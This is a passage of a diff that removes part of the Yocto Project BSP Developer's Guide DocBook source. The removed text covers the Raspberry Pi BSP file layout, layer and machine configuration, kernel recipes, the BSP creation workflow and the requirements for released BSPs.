- meta-raspberrypi/recipes-devtools/python/python-rtimu
- meta-raspberrypi/recipes-devtools/python/python-rtimu/*.patch
- meta-raspberrypi/recipes-devtools/python/python-rtimu_git.bb
- meta-raspberrypi/recipes-devtools/python/python-sense-hat_2.2.0.bb
- meta-raspberrypi/recipes-devtools/python/rpi-gpio
- meta-raspberrypi/recipes-devtools/python/rpi-gpio/*.patch
- meta-raspberrypi/recipes-devtools/python/rpi-gpio_0.6.3.bb
- meta-raspberrypi/recipes-devtools/python/rpio
- meta-raspberrypi/recipes-devtools/python/rpio/*.patch
- meta-raspberrypi/recipes-devtools/python/rpio_0.10.0.bb
- meta-raspberrypi/recipes-devtools/wiringPi
- meta-raspberrypi/recipes-devtools/wiringPi/files
- meta-raspberrypi/recipes-devtools/wiringPi/files/*.patch
- meta-raspberrypi/recipes-devtools/wiringPi/wiringpi_git.bb
- meta-raspberrypi/recipes-graphics
- meta-raspberrypi/recipes-graphics/eglinfo
- meta-raspberrypi/recipes-graphics/eglinfo/eglinfo-fb_%.bbappend
- meta-raspberrypi/recipes-graphics/eglinfo/eglinfo-x11_%.bbappend
- meta-raspberrypi/recipes-graphics/mesa
- meta-raspberrypi/recipes-graphics/mesa/mesa-gl_%.bbappend
- meta-raspberrypi/recipes-graphics/mesa/mesa_%.bbappend
- meta-raspberrypi/recipes-graphics/userland
- meta-raspberrypi/recipes-graphics/userland/userland
- meta-raspberrypi/recipes-graphics/userland/userland/*.patch
- meta-raspberrypi/recipes-graphics/userland/userland_git.bb
- meta-raspberrypi/recipes-graphics/vc-graphics
- meta-raspberrypi/recipes-graphics/vc-graphics/files
- meta-raspberrypi/recipes-graphics/vc-graphics/files/egl.pc
- meta-raspberrypi/recipes-graphics/vc-graphics/files/vchiq.sh
- meta-raspberrypi/recipes-graphics/vc-graphics/vc-graphics-hardfp.bb
- meta-raspberrypi/recipes-graphics/vc-graphics/vc-graphics.bb
- meta-raspberrypi/recipes-graphics/vc-graphics/vc-graphics.inc
- meta-raspberrypi/recipes-graphics/wayland
- meta-raspberrypi/recipes-graphics/wayland/weston_%.bbappend
- meta-raspberrypi/recipes-graphics/xorg-xserver
- meta-raspberrypi/recipes-graphics/xorg-xserver/xserver-xf86-config
- meta-raspberrypi/recipes-graphics/xorg-xserver/xserver-xf86-config/rpi
- meta-raspberrypi/recipes-graphics/xorg-xserver/xserver-xf86-config/rpi/xorg.conf
- meta-raspberrypi/recipes-graphics/xorg-xserver/xserver-xf86-config/rpi/xorg.conf.d
- meta-raspberrypi/recipes-graphics/xorg-xserver/xserver-xf86-config/rpi/xorg.conf.d/10-evdev.conf
- meta-raspberrypi/recipes-graphics/xorg-xserver/xserver-xf86-config/rpi/xorg.conf.d/98-pitft.conf
- meta-raspberrypi/recipes-graphics/xorg-xserver/xserver-xf86-config/rpi/xorg.conf.d/99-calibration.conf
- meta-raspberrypi/recipes-graphics/xorg-xserver/xserver-xf86-config_0.1.bbappend
- meta-raspberrypi/recipes-graphics/xorg-xserver/xserver-xorg_%.bbappend
- meta-raspberrypi/recipes-kernel
- meta-raspberrypi/recipes-kernel/linux-firmware
- meta-raspberrypi/recipes-kernel/linux-firmware/files
- meta-raspberrypi/recipes-kernel/linux-firmware/files/brcmfmac43430-sdio.bin
- meta-raspberrypi/recipes-kernel/linux-firmware/files/brcfmac43430-sdio.txt
- meta-raspberrypi/recipes-kernel/linux-firmware/linux-firmware_%.bbappend
- meta-raspberrypi/recipes-kernel/linux
- meta-raspberrypi/recipes-kernel/linux/linux-raspberrypi-dev.bb
- meta-raspberrypi/recipes-kernel/linux/linux-raspberrypi.inc
- meta-raspberrypi/recipes-kernel/linux/linux-raspberrypi_4.14.bb
- meta-raspberrypi/recipes-kernel/linux/linux-raspberrypi_4.9.bb
- meta-raspberrypi/recipes-multimedia
- meta-raspberrypi/recipes-multimedia/gstreamer
- meta-raspberrypi/recipes-multimedia/gstreamer/gstreamer1.0-omx
- meta-raspberrypi/recipes-multimedia/gstreamer/gstreamer1.0-omx/*.patch
- meta-raspberrypi/recipes-multimedia/gstreamer/gstreamer1.0-omx_%.bbappend
- meta-raspberrypi/recipes-multimedia/gstreamer/gstreamer1.0-plugins-bad_%.bbappend
- meta-raspberrypi/recipes-multimedia/gstreamer/gstreamer1.0-omx-1.12
- meta-raspberrypi/recipes-multimedia/gstreamer/gstreamer1.0-omx-1.12/*.patch
- meta-raspberrypi/recipes-multimedia/omxplayer
- meta-raspberrypi/recipes-multimedia/omxplayer/omxplayer
- meta-raspberrypi/recipes-multimedia/omxplayer/omxplayer/*.patch
- meta-raspberrypi/recipes-multimedia/omxplayer/omxplayer_git.bb
- meta-raspberrypi/recipes-multimedia/x264
- meta-raspberrypi/recipes-multimedia/x264/x264_git.bbappend
- meta-raspberrypi/wic
- meta-raspberrypi/wic/sdimage-raspberrypi.wks
- </literallayout>
- </para>
-
- <para>
- The following sections describe each part of the proposed
- BSP format.
- </para>
-
- <section id="bsp-filelayout-license">
- <title>License Files</title>
-
- <para>
- You can find these files in the BSP Layer at:
- <literallayout class='monospaced'>
- meta-<replaceable>bsp_root_name</replaceable>/<replaceable>bsp_license_file</replaceable>
- </literallayout>
- </para>
-
- <para>
- These optional files satisfy licensing requirements
- for the BSP.
- The type or types of files here can vary depending
- on the licensing requirements.
- For example, in the Raspberry Pi BSP, all licensing
- requirements are handled with the
- <filename>COPYING.MIT</filename> file.
- </para>
-
- <para>
- Licensing files can be MIT, BSD, GPLv*, and so forth.
- These files are recommended for the BSP but are
- optional and totally up to the BSP developer.
- For information on how to maintain license
- compliance, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#maintaining-open-source-license-compliance-during-your-products-lifecycle'>Maintaining Open Source License Compliance During Your Product's Lifecycle</ulink>"
- section in the Yocto Project Development Tasks
- Manual.
- </para>
- </section>
-
- <section id="bsp-filelayout-readme">
- <title>README File</title>
-
- <para>
- You can find this file in the BSP Layer at:
- <literallayout class='monospaced'>
- meta-<replaceable>bsp_root_name</replaceable>/README
- </literallayout>
- </para>
-
- <para>
- This file provides information on how to boot the live
- images that are optionally included in the
- <filename>binary/</filename> directory.
- The <filename>README</filename> file also provides
- information needed for building the image.
- </para>
-
- <para>
- At a minimum, the <filename>README</filename> file must
- contain a list of dependencies, such as the names of
- any other layers on which the BSP depends and the name of
- the BSP maintainer with his or her contact information.
- </para>
- </section>
-
- <section id="bsp-filelayout-readme-sources">
- <title>README.sources File</title>
-
- <para>
- You can find this file in the BSP Layer at:
- <literallayout class='monospaced'>
- meta-<replaceable>bsp_root_name</replaceable>/README.sources
- </literallayout>
- </para>
-
- <para>
- This file provides information on where to locate the BSP
- source files used to build the images (if any) that
- reside in
- <filename>meta-<replaceable>bsp_root_name</replaceable>/binary</filename>.
- Images in the <filename>binary</filename> would be images
- released with the BSP.
- The information in the <filename>README.sources</filename>
- file also helps you find the
- <ulink url='&YOCTO_DOCS_REF_URL;#metadata'>Metadata</ulink>
- used to generate the images that ship with the BSP.
- <note>
- If the BSP's <filename>binary</filename> directory is
- missing or the directory has no images, an existing
- <filename>README.sources</filename> file is
- meaningless and usually does not exist.
- </note>
- </para>
- </section>
-
- <section id="bsp-filelayout-binary">
- <title>Pre-built User Binaries</title>
-
- <para>
- You can find these files in the BSP Layer at:
- <literallayout class='monospaced'>
- meta-<replaceable>bsp_root_name</replaceable>/binary/<replaceable>bootable_images</replaceable>
- </literallayout>
- </para>
-
- <para>
- This optional area contains useful pre-built kernels
- and user-space filesystem images released with the
- BSP that are appropriate to the target system.
- This directory typically contains graphical (e.g. Sato)
- and minimal live images when the BSP tarball has been
- created and made available in the
- <ulink url='&YOCTO_HOME_URL;'>Yocto Project</ulink>
- website.
- You can use these kernels and images to get a system
- running and quickly get started on development tasks.
- </para>
-
- <para>
- The exact types of binaries present are highly
- hardware-dependent.
- The
- <link linkend='bsp-filelayout-readme'><filename>README</filename></link>
- file should be present in the BSP Layer and it
- explains how to use the images with the target hardware.
- Additionally, the
- <link linkend='bsp-filelayout-readme-sources'><filename>README.sources</filename></link>
- file should be present to locate the sources used to
- build the images and provide information on the
- Metadata.
- </para>
- </section>
-
- <section id='bsp-filelayout-layer'>
- <title>Layer Configuration File</title>
-
- <para>
- You can find this file in the BSP Layer at:
- <literallayout class='monospaced'>
- meta-<replaceable>bsp_root_name</replaceable>/conf/layer.conf
- </literallayout>
- </para>
-
- <para>
- The <filename>conf/layer.conf</filename> file
- identifies the file structure as a layer,
- identifies the contents of the layer, and
- contains information about how the build system should
- use it.
- Generally, a standard boilerplate file such as the
- following works.
- In the following example, you would replace
- <replaceable>bsp</replaceable> with the actual
- name of the BSP (i.e.
- <replaceable>bsp_root_name</replaceable> from the example
- template).
- </para>
-
- <para>
- <literallayout class='monospaced'>
- # We have a conf and classes directory, add to BBPATH
- BBPATH .= ":${LAYERDIR}"
-
- # We have a recipes directory, add to BBFILES
- BBFILES += "${LAYERDIR}/recipes-*/*/*.bb \
- ${LAYERDIR}/recipes-*/*/*.bbappend"
-
- BBFILE_COLLECTIONS += "<replaceable>bsp</replaceable>"
- BBFILE_PATTERN_<replaceable>bsp</replaceable> = "^${LAYERDIR}/"
- BBFILE_PRIORITY_<replaceable>bsp</replaceable> = "6"
-
- LAYERDEPENDS_<replaceable>bsp</replaceable> = "intel"
- </literallayout>
- </para>
-
- <para>
- To illustrate the string substitutions, here are
- the corresponding statements from the Raspberry
- Pi <filename>conf/layer.conf</filename> file:
- <literallayout class='monospaced'>
- # We have a conf and classes directory, append to BBPATH
- BBPATH .= ":${LAYERDIR}"
-
- # We have a recipes directory containing .bb and .bbappend files, add to BBFILES
- BBFILES += "${LAYERDIR}/recipes*/*/*.bb \
- ${LAYERDIR}/recipes*/*/*.bbappend"
-
- BBFILE_COLLECTIONS += "raspberrypi"
- BBFILE_PATTERN_raspberrypi := "^${LAYERDIR}/"
- BBFILE_PRIORITY_raspberrypi = "9"
-
- # Additional license directories.
- LICENSE_PATH += "${LAYERDIR}/files/custom-licenses"
- .
- .
- .
- </literallayout>
- </para>
-
- <para>
- This file simply makes
- <ulink url='&YOCTO_DOCS_REF_URL;#bitbake-term'>BitBake</ulink>
- aware of the recipes and configuration directories.
- The file must exist so that the OpenEmbedded build system
- can recognize the BSP.
- </para>
- </section>
-
- <section id="bsp-filelayout-machine">
- <title>Hardware Configuration Options</title>
-
- <para>
- You can find these files in the BSP Layer at:
- <literallayout class='monospaced'>
- meta-<replaceable>bsp_root_name</replaceable>/conf/machine/*.conf
- </literallayout>
- </para>
-
- <para>
- The machine files bind together all the information
- contained elsewhere in the BSP into a format that
- the build system can understand.
- Each BSP Layer requires at least one machine file.
- If the BSP supports multiple machines, multiple
- machine configuration files can exist.
- These filenames correspond to the values to which
- users have set the
- <ulink url='&YOCTO_DOCS_REF_URL;#var-MACHINE'><filename>MACHINE</filename></ulink> variable.
- </para>
-
- <para>
- These files define things such as the kernel package
- to use
- (<ulink url='&YOCTO_DOCS_REF_URL;#var-PREFERRED_PROVIDER'><filename>PREFERRED_PROVIDER</filename></ulink>
- of
- <ulink url='&YOCTO_DOCS_DEV_URL;#metadata-virtual-providers'>virtual/kernel</ulink>),
- the hardware drivers to include in different types
- of images, any special software components that are
- needed, any bootloader information, and also any
- special image format requirements.
- </para>
-
- <para>
- This configuration file could also include a hardware
- "tuning" file that is commonly used to define the
- package architecture and specify optimization flags,
- which are carefully chosen to give best performance
- on a given processor.
- </para>
-
- <para>
- Tuning files are found in the
- <filename>meta/conf/machine/include</filename>
- directory within the
- <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>.
- For example, many <filename>tune-*</filename> files
- (e.g. <filename>tune-arm1136jf-s.inc</filename>,
- <filename>tune-1586-nlp.inc</filename>, and so forth)
- reside in the
- <filename>poky/meta/conf/machine/include</filename>
- directory.
- </para>
-
- <para>
- To use an include file, you simply include them in the
- machine configuration file.
- For example, the Raspberry Pi BSP
- <filename>raspberrypi3.conf</filename> contains the
- following statement:
- <literallayout class='monospaced'>
- include conf/machine/include/rpi-base.inc
- </literallayout>
- </para>
- </section>
-
- <section id='bsp-filelayout-misc-recipes'>
- <title>Miscellaneous BSP-Specific Recipe Files</title>
-
- <para>
- You can find these files in the BSP Layer at:
- <literallayout class='monospaced'>
- meta-<replaceable>bsp_root_name</replaceable>/recipes-bsp/*
- </literallayout>
- </para>
-
- <para>
- This optional directory contains miscellaneous recipe
- files for the BSP.
- Most notably would be the formfactor files.
- For example, in the Raspberry Pi BSP, there is the
- <filename>formfactor_0.0.bbappend</filename> file,
- which is an append file used to augment the recipe
- that starts the build.
- Furthermore, there are machine-specific settings used
- during the build that are defined by the
- <filename>machconfig</filename> file further down in
- the directory.
- Here is the <filename>machconfig</filename> file for
- the Raspberry Pi BSP:
- <literallayout class='monospaced'>
- HAVE_TOUCHSCREEN=0
- HAVE_KEYBOARD=1
-
- DISPLAY_CAN_ROTATE=0
- DISPLAY_ORIENTATION=0
- DISPLAY_DPI=133
- </literallayout>
- </para>
-
- <note><para>
- If a BSP does not have a formfactor entry, defaults
- are established according to the formfactor
- configuration file that is installed by the main
- formfactor recipe
- <filename>meta/recipes-bsp/formfactor/formfactor_0.0.bb</filename>,
- which is found in the
- <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>.
- </para></note>
- </section>
-
- <section id='bsp-filelayout-recipes-graphics'>
- <title>Display Support Files</title>
-
- <para>
- You can find these files in the BSP Layer at:
- <literallayout class='monospaced'>
- meta-<replaceable>bsp_root_name</replaceable>/recipes-graphics/*
- </literallayout>
- </para>
-
- <para>
- This optional directory contains recipes for the
- BSP if it has special requirements for graphics
- support.
- All files that are needed for the BSP to support
- a display are kept here.
- </para>
- </section>
-
- <section id='bsp-filelayout-kernel'>
- <title>Linux Kernel Configuration</title>
-
- <para>
- You can find these files in the BSP Layer at:
- <literallayout class='monospaced'>
- meta-<replaceable>bsp_root_name</replaceable>/recipes-kernel/linux/linux*.bbappend
- meta-<replaceable>bsp_root_name</replaceable>/recipes-kernel/linux/*.bb
- </literallayout>
- </para>
-
- <para>
- Append files (<filename>*.bbappend</filename>) modify
- the main kernel recipe being used to build the image.
- The <filename>*.bb</filename> files would be a
- developer-supplied kernel recipe.
- This area of the BSP hierarchy can contain both these
- types of files although, in practice, it is likely that
- you would have one or the other.
- </para>
-
- <para>
- For your BSP, you typically want to use an existing Yocto
- Project kernel recipe found in the
- <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>
- at <filename>meta/recipes-kernel/linux</filename>.
- You can append machine-specific changes to the
- kernel recipe by using a similarly named append
- file, which is located in the BSP Layer for your
- target device (e.g. the
- <filename>meta-<replaceable>bsp_root_name</replaceable>/recipes-kernel/linux</filename> directory).
- </para>
-
- <para>
- Suppose you are using the
- <filename>linux-yocto_4.4.bb</filename> recipe to
- build the kernel.
- In other words, you have selected the kernel in your
- <replaceable>bsp_root_name</replaceable><filename>.conf</filename>
- file by adding
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PREFERRED_PROVIDER'><filename>PREFERRED_PROVIDER</filename></ulink>
- and
- <ulink url='&YOCTO_DOCS_REF_URL;#var-PREFERRED_VERSION'><filename>PREFERRED_VERSION</filename></ulink>
- statements as follows:
- <literallayout class='monospaced'>
- PREFERRED_PROVIDER_virtual/kernel ?= "linux-yocto"
- PREFERRED_VERSION_linux-yocto ?= "4.4%"
- </literallayout>
- <note>
- When the preferred provider is assumed by
- default, the
- <filename>PREFERRED_PROVIDER</filename>
- statement does not appear in the
- <replaceable>bsp_root_name</replaceable><filename>.conf</filename> file.
- </note>
- You would use the
- <filename>linux-yocto_4.4.bbappend</filename>
- file to append specific BSP settings to the kernel,
- thus configuring the kernel for your particular BSP.
- </para>
-
- <para>
- You can find more information on what your append file
- should contain in the
- "<ulink url='&YOCTO_DOCS_KERNEL_DEV_URL;#creating-the-append-file'>Creating the Append File</ulink>"
- section in the Yocto Project Linux Kernel Development
- Manual.
- </para>
-
- <para>
- An alternate scenario is when you create your own
- kernel recipe for the BSP.
- A good example of this is the Raspberry Pi BSP.
- If you examine the
- <filename>recipes-kernel/linux</filename> directory
- you see the following:
- <literallayout class='monospaced'>
- linux-raspberrypi-dev.bb
- linux-raspberrypi.inc
- linux-raspberrypi_4.14.bb
- linux-raspberrypi_4.9.bb
- </literallayout>
- The directory contains three kernel recipes and a
- common include file.
- </para>
- </section>
-</section>
-
-<section id='developing-a-board-support-package-bsp'>
- <title>Developing a Board Support Package (BSP)</title>
-
- <para>
- This section describes the high-level procedure you can
- follow to create a BSP.
- Although not required for BSP creation, the
- <filename>meta-intel</filename> repository, which
- contains many BSPs supported by the Yocto Project,
- is part of the example.
- </para>
-
- <para>
- For an example that shows how to create a new
- layer using the tools, see the
- "<link linkend='creating-a-new-bsp-layer-using-the-bitbake-layers-script'>Creating a New BSP Layer Using the <filename>bitbake-layers</filename> Script</link>"
- section.
- </para>
-
- <para>
- The following illustration and list summarize the BSP
- creation general workflow.
- </para>
-
- <para>
- <imagedata fileref="figures/bsp-dev-flow.png" width="7in" depth="5in" align="center" scalefit="1" />
- </para>
-
- <para>
- <orderedlist>
- <listitem><para>
- <emphasis>Set up Your Host Development System
- to Support Development Using the Yocto
- Project</emphasis>:
- See the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#dev-preparing-the-build-host'>Preparing the Build Host</ulink>"
- section in the Yocto Project Development Tasks
- Manual for options on how to get a system ready
- to use the Yocto Project.
- </para></listitem>
- <listitem><para>
- <emphasis>Establish the
- <filename>meta-intel</filename>
- Repository on Your System:</emphasis>
- Having local copies of these supported BSP layers
- on your system gives you access to layers you
- might be able to leverage when creating your BSP.
- For information on how to get these files, see the
- "<link linkend='preparing-your-build-host-to-work-with-bsp-layers'>Preparing Your Build Host to Work with BSP Layers</link>"
- section.
- </para></listitem>
- <listitem><para>
- <emphasis>Create Your Own BSP Layer Using the
- <filename>bitbake-layers</filename>
- Script:</emphasis>
- Layers are ideal for isolating and storing work
- for a given piece of hardware.
- A layer is really just a location or area in which you
- place the recipes and configurations for your BSP.
- In fact, a BSP is, in itself, a special type of layer.
- The simplest way to create a new BSP layer that is
- compliant with the Yocto Project is to use the
- <filename>bitbake-layers</filename> script.
- For information about that script, see the
- "<link linkend='creating-a-new-bsp-layer-using-the-bitbake-layers-script'>Creating a New BSP Layer Using the <filename>bitbake-layers</filename> Script</link>"
- section.</para>
-
- <para>Another example that illustrates a layer
- is an application.
- Suppose you are creating an application that has
- library or other dependencies in order for it to
- compile and run.
- The layer, in this case, would be where all the
- recipes that define those dependencies are kept.
- The key point for a layer is that it is an
- isolated area that contains all the relevant
- information for the project that the
- OpenEmbedded build system knows about.
- For more information on layers, see the
- "<ulink url='&YOCTO_DOCS_OM_URL;#the-yocto-project-layer-model'>The Yocto Project Layer Model</ulink>"
- section in the Yocto Project Overview and Concepts
- Manual.
- You can also reference the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#understanding-and-creating-layers'>Understanding and Creating Layers</ulink>"
- section in the Yocto Project Development Tasks
- Manual.
- For more information on BSP layers, see the
- "<link linkend='bsp-layers'>BSP Layers</link>"
- section.
- <note><title>Notes</title>
- <itemizedlist>
- <listitem><para>
- Five hardware reference BSPs exist
- that are part of the Yocto Project release
- and are located in the
- <filename>poky/meta-yocto-bsp</filename> BSP
- layer:
- <itemizedlist>
- <listitem><para>
- Texas Instruments Beaglebone
- (<filename>beaglebone-yocto</filename>)
- </para></listitem>
- <listitem><para>
- Ubiquiti Networks EdgeRouter Lite
- (<filename>edgerouter</filename>)
- </para></listitem>
- <listitem><para>
- Two general IA platforms
- (<filename>genericx86</filename> and
- <filename>genericx86-64</filename>)
- </para></listitem>
- </itemizedlist>
- </para></listitem>
- <listitem><para>
- Three core Intel BSPs exist as part of
- the Yocto Project release in the
- <filename>meta-intel</filename> layer:
- <itemizedlist>
- <listitem><para>
- <filename>intel-core2-32</filename>,
- which is a BSP optimized for the Core2
- family of CPUs as well as all CPUs
- prior to the Silvermont core.
- </para></listitem>
- <listitem><para>
- <filename>intel-corei7-64</filename>,
- which is a BSP optimized for Nehalem
- and later Core and Xeon CPUs as well
- as Silvermont and later Atom CPUs,
- such as the Baytrail SoCs.
- </para></listitem>
- <listitem><para>
- <filename>intel-quark</filename>,
- which is a BSP optimized for the
- Intel Galileo gen1 &amp; gen2
- development boards.
- </para></listitem>
- </itemizedlist>
- </para></listitem>
- </itemizedlist>
- </note></para>
-
- <para>When you set up a layer for a new BSP,
- you should follow a standard layout.
- This layout is described in the
- "<link linkend='bsp-filelayout'>Example Filesystem Layout</link>"
- section.
- In the standard layout, notice the suggested
- structure for recipes and configuration
- information.
- You can see the standard layout for a BSP
- by examining any supported BSP found in the
- <filename>meta-intel</filename> layer inside
- the Source Directory.
- </para></listitem>
- <listitem><para>
- <emphasis>Make Configuration Changes to Your New
- BSP Layer:</emphasis>
- The standard BSP layer structure organizes the
- files you need to edit in
- <filename>conf</filename> and several
- <filename>recipes-*</filename> directories
- within the BSP layer.
- Configuration changes identify where your new
- layer is on the local system and identifies the
- kernel you are going to use.
- When you run the
- <filename>bitbake-layers</filename> script,
- you are able to interactively configure many
- things for the BSP (e.g. keyboard, touchscreen,
- and so forth).
- </para></listitem>
- <listitem><para>
- <emphasis>Make Recipe Changes to Your New BSP
- Layer:</emphasis>
- Recipe changes include altering recipes
- (<filename>*.bb</filename> files), removing
- recipes you do not use, and adding new recipes
- or append files (<filename>.bbappend</filename>)
- that support your hardware.
- </para></listitem>
- <listitem><para>
- <emphasis>Prepare for the Build:</emphasis>
- Once you have made all the changes to your BSP
- layer, there remains a few things you need to
- do for the OpenEmbedded build system in order
- for it to create your image.
- You need to get the build environment ready by
- sourcing an environment setup script
- (i.e. <filename>oe-init-build-env</filename>)
- and you need to be sure two key configuration
- files are configured appropriately: the
- <filename>conf/local.conf</filename> and the
- <filename>conf/bblayers.conf</filename> file.
- You must make the OpenEmbedded build system aware
- of your new layer.
- See the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#enabling-your-layer'>Enabling Your Layer</ulink>"
- section in the Yocto Project Development Tasks Manual
- for information on how to let the build system
- know about your new layer.
- </para></listitem>
- <listitem><para>
- <emphasis>Build the Image:</emphasis>
- The OpenEmbedded build system uses the BitBake tool
- to build images based on the type of image you want to
- create.
- You can find more information about BitBake in the
- <ulink url='&YOCTO_DOCS_BB_URL;'>BitBake User Manual</ulink>.
- </para>
-
- <para>The build process supports several types of
- images to satisfy different needs.
- See the
- "<ulink url='&YOCTO_DOCS_REF_URL;#ref-images'>Images</ulink>"
- chapter in the Yocto Project Reference Manual for
- information on supported images.
- </para></listitem>
- </orderedlist>
- </para>
-</section>
-
-<section id='requirements-and-recommendations-for-released-bsps'>
- <title>Requirements and Recommendations for Released BSPs</title>
-
- <para>
- Certain requirements exist for a released BSP to be
- considered compliant with the Yocto Project.
- Additionally, recommendations also exist.
- This section describes the requirements and
- recommendations for released BSPs.
- </para>
-
- <section id='released-bsp-requirements'>
- <title>Released BSP Requirements</title>
-
- <para>
- Before looking at BSP requirements, you should consider
- the following:
- <itemizedlist>
- <listitem><para>
- The requirements here assume the BSP layer
- is a well-formed, "legal" layer that can be
- added to the Yocto Project.
- For guidelines on creating a layer that meets
- these base requirements, see the
- "<link linkend='bsp-layers'>BSP Layers</link>"
- section in this manual and the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#understanding-and-creating-layers'>Understanding and Creating Layers"</ulink>"
- section in the Yocto Project Development Tasks
- Manual.
- </para></listitem>
- <listitem><para>
- The requirements in this section apply
- regardless of how you package a BSP.
- You should consult the packaging and distribution
- guidelines for your specific release process.
- For an example of packaging and distribution
- requirements, see the
- "<ulink url='https://wiki.yoctoproject.org/wiki/Third_Party_BSP_Release_Process'>Third Party BSP Release Process</ulink>"
- wiki page.
- </para></listitem>
- <listitem><para>
- The requirements for the BSP as it is made
- available to a developer are completely
- independent of the released form of the BSP.
- For example, the BSP Metadata can be contained
- within a Git repository and could have a directory
- structure completely different from what appears
- in the officially released BSP layer.
- </para></listitem>
- <listitem><para>
- It is not required that specific packages or
- package modifications exist in the BSP layer,
- beyond the requirements for general
- compliance with the Yocto Project.
- For example, no requirement exists dictating
- that a specific kernel or kernel version be
- used in a given BSP.
- </para></listitem>
- </itemizedlist>
- </para>
-
- <para>
- Following are the requirements for a released BSP
- that conform to the Yocto Project:
- <itemizedlist>
- <listitem><para>
- <emphasis>Layer Name:</emphasis>
- The BSP must have a layer name that follows
- the Yocto Project standards.
- For information on BSP layer names, see the
- "<link linkend='bsp-layers'>BSP Layers</link>" section.
- </para></listitem>
- <listitem><para>
- <emphasis>File System Layout:</emphasis>
- When possible, use the same directory names
- in your BSP layer as listed in the
- <filename>recipes.txt</filename> file, which
- is found in <filename>poky/meta</filename>
- directory of the
- <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>
- or in the OpenEmbedded-Core Layer
- (<filename>openembedded-core</filename>) at
- <ulink url='http://git.openembedded.org/openembedded-core/tree/meta'></ulink>.
- </para>
-
- <para>You should place recipes
- (<filename>*.bb</filename> files) and recipe
- modifications (<filename>*.bbappend</filename>
- files) into <filename>recipes-*</filename>
- subdirectories by functional area as outlined
- in <filename>recipes.txt</filename>.
- If you cannot find a category in
- <filename>recipes.txt</filename> to fit a
- particular recipe, you can make up your own
- <filename>recipes-*</filename> subdirectory.
- </para>
-
- <para>Within any particular
- <filename>recipes-*</filename> category, the
- layout should match what is found in the
- OpenEmbedded-Core Git repository
- (<filename>openembedded-core</filename>)
- or the Source Directory (<filename>poky</filename>).
- In other words, make sure you place related
- files in appropriately-related
- <filename>recipes-*</filename> subdirectories
- specific to the recipe's function, or within
- a subdirectory containing a set of closely-related
- recipes.
- The recipes themselves should follow the general
- guidelines for recipes used in the Yocto Project
- found in the
- "<ulink url='http://openembedded.org/wiki/Styleguide'>OpenEmbedded Style Guide</ulink>".
- </para></listitem>
- <listitem><para>
- <emphasis>License File:</emphasis>
- You must include a license file in the
- <filename>meta-</filename><replaceable>bsp_root_name</replaceable>
- directory.
- This license covers the BSP Metadata as a whole.
- You must specify which license to use since no
- default license exists when one is not specified.
- See the
- <ulink url='&YOCTO_GIT_URL;/cgit.cgi/meta-raspberrypi/tree/COPYING.MIT'><filename>COPYING.MIT</filename></ulink>
- file for the Raspberry Pi BSP in the
- <filename>meta-raspberrypi</filename> BSP layer
- as an example.
- </para></listitem>
- <listitem><para>
- <emphasis>README File:</emphasis>
- You must include a <filename>README</filename>
- file in the
- <filename>meta-</filename><replaceable>bsp_root_name</replaceable>
- directory.
- See the
- <ulink url='&YOCTO_GIT_URL;/cgit.cgi/meta-raspberrypi/tree/README.md'><filename>README.md</filename></ulink>
- file for the Raspberry Pi BSP in the
- <filename>meta-raspberrypi</filename> BSP layer
- as an example.</para>
-
- <para>At a minimum, the <filename>README</filename>
- file should contain the following:
- <itemizedlist>
- <listitem><para>
- A brief description of the target hardware.
- </para></listitem>
- <listitem><para>
- A list of all the dependencies of the BSP.
- These dependencies are typically a list
- of required layers needed to build the
- BSP.
- However, the dependencies should also
- contain information regarding any other
- dependencies the BSP might have.
- </para></listitem>
- <listitem><para>
- Any required special licensing information.
- For example, this information includes
- information on special variables needed
- to satisfy a EULA, or instructions on
- information needed to build or distribute
- binaries built from the BSP Metadata.
- </para></listitem>
- <listitem><para>
- The name and contact information for the
- BSP layer maintainer.
- This is the person to whom patches and
- questions should be sent.
- For information on how to find the right
- person, see the
- "<ulink url='&YOCTO_DOCS_DEV_URL;#how-to-submit-a-change'>Submitting a Change to the Yocto Project</ulink>"
- section in the Yocto Project Development
- Tasks Manual.
- </para></listitem>
- <listitem><para>
- Instructions on how to build the BSP using
- the BSP layer.
- </para></listitem>
- <listitem><para>
- Instructions on how to boot the BSP build
- from the BSP layer.
- </para></listitem>
- <listitem><para>
- Instructions on how to boot the binary
- images contained in the
- <filename>binary</filename> directory,
- if present.
- </para></listitem>
- <listitem><para>
- Information on any known bugs or issues
- that users should know about when either
- building or booting the BSP binaries.
- </para></listitem>
- </itemizedlist>
- </para></listitem>
- <listitem><para>
- <emphasis>README.sources File:</emphasis>
- If you BSP contains binary images in the
- <filename>binary</filename> directory, you must
- include a <filename>README.sources</filename>
- file in the
- <filename>meta-</filename><replaceable>bsp_root_name</replaceable>
- directory.
- This file specifies exactly where you can find
- the sources used to generate the binary images.
- </para></listitem>
- <listitem><para>
- <emphasis>Layer Configuration File:</emphasis>
- You must include a
- <filename>conf/layer.conf</filename> file in
- the
- <filename>meta-</filename><replaceable>bsp_root_name</replaceable>
- directory.
- This file identifies the
- <filename>meta-</filename><replaceable>bsp_root_name</replaceable>
- BSP layer as a layer to the build system.
- </para></listitem>
- <listitem><para>
- <emphasis>Machine Configuration File:</emphasis>
- You must include one or more
- <filename>conf/machine/</filename><replaceable>bsp_root_name</replaceable><filename>.conf</filename>
- files in the
- <filename>meta-</filename><replaceable>bsp_root_name</replaceable>
- directory.
- These configuration files define machine targets
- that can be built using the BSP layer.
- Multiple machine configuration files define
- variations of machine configurations that the
- BSP supports.
- If a BSP supports multiple machine variations,
- you need to adequately describe each variation
- in the BSP <filename>README</filename> file.
- Do not use multiple machine configuration files
- to describe disparate hardware.
- If you do have very different targets, you should
- create separate BSP layers for each target.
- <note>
- It is completely possible for a developer to
- structure the working repository as a
- conglomeration of unrelated BSP files, and to
- possibly generate BSPs targeted for release
- from that directory using scripts or some
- other mechanism
- (e.g. <filename>meta-yocto-bsp</filename> layer).
- Such considerations are outside the scope of
- this document.
- </note>
- </para></listitem>
- </itemizedlist>
- </para>
- </section>
-
- <section id='released-bsp-recommendations'>
- <title>Released BSP Recommendations</title>
-
